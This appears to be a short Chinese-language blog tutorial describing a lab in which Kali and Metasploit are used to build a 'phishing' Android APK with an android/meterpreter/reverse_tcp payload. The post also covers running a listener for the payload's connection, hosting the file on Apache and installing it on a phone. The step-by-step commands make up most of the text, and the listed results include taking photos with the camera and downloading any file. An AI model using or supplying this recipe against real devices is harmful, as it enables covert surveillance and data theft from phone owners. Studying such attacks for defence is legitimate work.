实验环境:

  • KALI (IN VMWARE)
  • Metasploit (IN KALI)
  • Android 4.1.2
  • Apache2 (IN KALI)

实验步骤:

步骤1. 打开KALI终端,并在终端打开msfconsole:

步骤2. 运行以下命令使用android/meterpreter/reverse_tcp的payload,用于监听程序的连接,使用Metasploit handler:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
步骤3. 运行命令设置lhost和lport,其中lhost我使用了本机的地址,lport我使用了8080作为端口号:

步骤4. 运行exploit开始监听

步骤5. 制作钓鱼APK,使用KALI终端运行以下命令,该命令会在桌面生成一个DropsMsf.apk文件
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.199.207 LPORT=8080 R > /root/Desktop/DropsMsf.apk 

步骤6. 运行Apache并搭建简易Web服务器提供apk下载(不是本次实验主要内容简单过)

步骤7. 使用手机下载apk并安装


实验结果

  • 可获取Android手机的摄像头权限拍摄照片
  • 可下载Android手机的任意文件
  • 等等

####实验结果展示

本博客所有内容只用于安全研究,请勿用于恶意攻击。
本文URL: "https://blog.neargle.com/2015/06/28/android-msf-exploit-by-reverse-tcp/index.html"